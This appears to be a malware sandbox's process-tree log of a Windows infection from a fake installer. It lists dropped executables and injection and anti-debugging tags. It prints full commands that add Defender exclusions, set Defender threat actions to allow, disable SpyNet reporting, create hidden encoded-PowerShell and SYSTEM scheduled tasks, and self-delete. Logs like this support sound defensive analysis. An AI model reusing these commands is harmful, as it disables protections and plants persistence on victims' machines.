C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\haesdjvC:\Users\Admin\AppData\Roaming\haesdjv2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\haesdjvC:\Users\Admin\AppData\Roaming\haesdjv3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\chesdjvC:\Users\Admin\AppData\Roaming\chesdjv2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Local\959e4e90-29c1-416c-9d68-7bedaaa37c27\4405.exeC:\Users\Admin\AppData\Local\959e4e90-29c1-416c-9d68-7bedaaa37c27\4405.exe --Task2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\959e4e90-29c1-416c-9d68-7bedaaa37c27\4405.exeC:\Users\Admin\AppData\Local\959e4e90-29c1-416c-9d68-7bedaaa37c27\4405.exe --Task3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Local\959e4e90-29c1-416c-9d68-7bedaaa37c27\4405.exeC:\Users\Admin\AppData\Local\959e4e90-29c1-416c-9d68-7bedaaa37c27\4405.exe --Task2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\959e4e90-29c1-416c-9d68-7bedaaa37c27\4405.exeC:\Users\Admin\AppData\Local\959e4e90-29c1-416c-9d68-7bedaaa37c27\4405.exe --Task3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\haesdjvC:\Users\Admin\AppData\Roaming\haesdjv2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\haesdjvC:\Users\Admin\AppData\Roaming\haesdjv3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\chesdjvC:\Users\Admin\AppData\Roaming\chesdjv2⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe "C:\Program Files (x86)\OnpGSK\OnpGSK.dll",OnpGSK2⤵
- Windows security modification
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Local\959e4e90-29c1-416c-9d68-7bedaaa37c27\4405.exeC:\Users\Admin\AppData\Local\959e4e90-29c1-416c-9d68-7bedaaa37c27\4405.exe --Task2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\959e4e90-29c1-416c-9d68-7bedaaa37c27\4405.exeC:\Users\Admin\AppData\Local\959e4e90-29c1-416c-9d68-7bedaaa37c27\4405.exe --Task3⤵
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS099867B2\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS099867B2\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed151f5e3fd2.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS099867B2\Wed151f5e3fd2.exeWed151f5e3fd2.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed1529d8198a8f0c1.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS099867B2\Wed1529d8198a8f0c1.exeWed1529d8198a8f0c1.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\5942528.scr"C:\Users\Admin\AppData\Roaming\5942528.scr" /S6⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\5130897.scr"C:\Users\Admin\AppData\Roaming\5130897.scr" /S6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\4250224.scr"C:\Users\Admin\AppData\Roaming\4250224.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\1799120.scr"C:\Users\Admin\AppData\Roaming\1799120.scr" /S6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed15228d911b9d5c.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS099867B2\Wed15228d911b9d5c.exeWed15228d911b9d5c.exe5⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Documents\aQzdWm4sZ4mExkWjoly9GkDv.exe"C:\Users\Admin\Documents\aQzdWm4sZ4mExkWjoly9GkDv.exe"6⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"7⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff95c044f50,0x7ff95c044f60,0x7ff95c044f708⤵
-
C:\Users\Admin\Documents\GCgT7iJXho4GMXH3WSTm9kau.exe"C:\Users\Admin\Documents\GCgT7iJXho4GMXH3WSTm9kau.exe"6⤵
-
C:\Users\Admin\Documents\7z3i7iVZKCBzKYjPqh05gUqd.exe"C:\Users\Admin\Documents\7z3i7iVZKCBzKYjPqh05gUqd.exe"6⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"7⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"8⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"7⤵
- Enumerates system info in registry
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ff969644f50,0x7ff969644f60,0x7ff969644f708⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1804,12530034004860434668,8656885469716047659,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1816 /prefetch:28⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1804,12530034004860434668,8656885469716047659,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1876 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1804,12530034004860434668,8656885469716047659,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2352 /prefetch:18⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1804,12530034004860434668,8656885469716047659,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1864 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1804,12530034004860434668,8656885469716047659,131072 --lang=en-US --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2360 /prefetch:18⤵
- Executes dropped EXE
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1804,12530034004860434668,8656885469716047659,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:18⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1804,12530034004860434668,8656885469716047659,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3544 /prefetch:18⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1804,12530034004860434668,8656885469716047659,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3576 /prefetch:18⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1804,12530034004860434668,8656885469716047659,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3768 /prefetch:18⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1804,12530034004860434668,8656885469716047659,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4308 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1804,12530034004860434668,8656885469716047659,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5052 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1804,12530034004860434668,8656885469716047659,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3716 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1804,12530034004860434668,8656885469716047659,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5144 /prefetch:28⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 5644 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\7z3i7iVZKCBzKYjPqh05gUqd.exe"7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 56448⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 5644 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\7z3i7iVZKCBzKYjPqh05gUqd.exe"7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 56448⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\eLM_0SBghdYAqJ9iQGzz5BLG.exe"C:\Users\Admin\Documents\eLM_0SBghdYAqJ9iQGzz5BLG.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\Fac1uSxBQ9x2PWAm4MS1btxQ.exe"C:\Users\Admin\Documents\Fac1uSxBQ9x2PWAm4MS1btxQ.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\Fac1uSxBQ9x2PWAm4MS1btxQ.exe"C:\Users\Admin\Documents\Fac1uSxBQ9x2PWAm4MS1btxQ.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\k_d66lbz23OpbpYyImH0O2AD.exe"C:\Users\Admin\Documents\k_d66lbz23OpbpYyImH0O2AD.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS1B45.tmp\Install.exe.\Install.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS315D.tmp\Install.exe.\Install.exe /S /site_id "394347"8⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &9⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gRlYFCYzD" /SC once /ST 14:10:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="9⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gRlYFCYzD"9⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gRlYFCYzD"9⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 21:36:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\GYXbneo.exe\" uG /site_id 394347 /S" /V1 /F9⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
-
C:\Users\Admin\Documents\TaZ4XenOUq8SZGomihHpzAYC.exe"C:\Users\Admin\Documents\TaZ4XenOUq8SZGomihHpzAYC.exe"6⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\aHgJqi7ecZWfKQMTBT42KYbc.exe"C:\Users\Admin\Documents\aHgJqi7ecZWfKQMTBT42KYbc.exe"6⤵
-
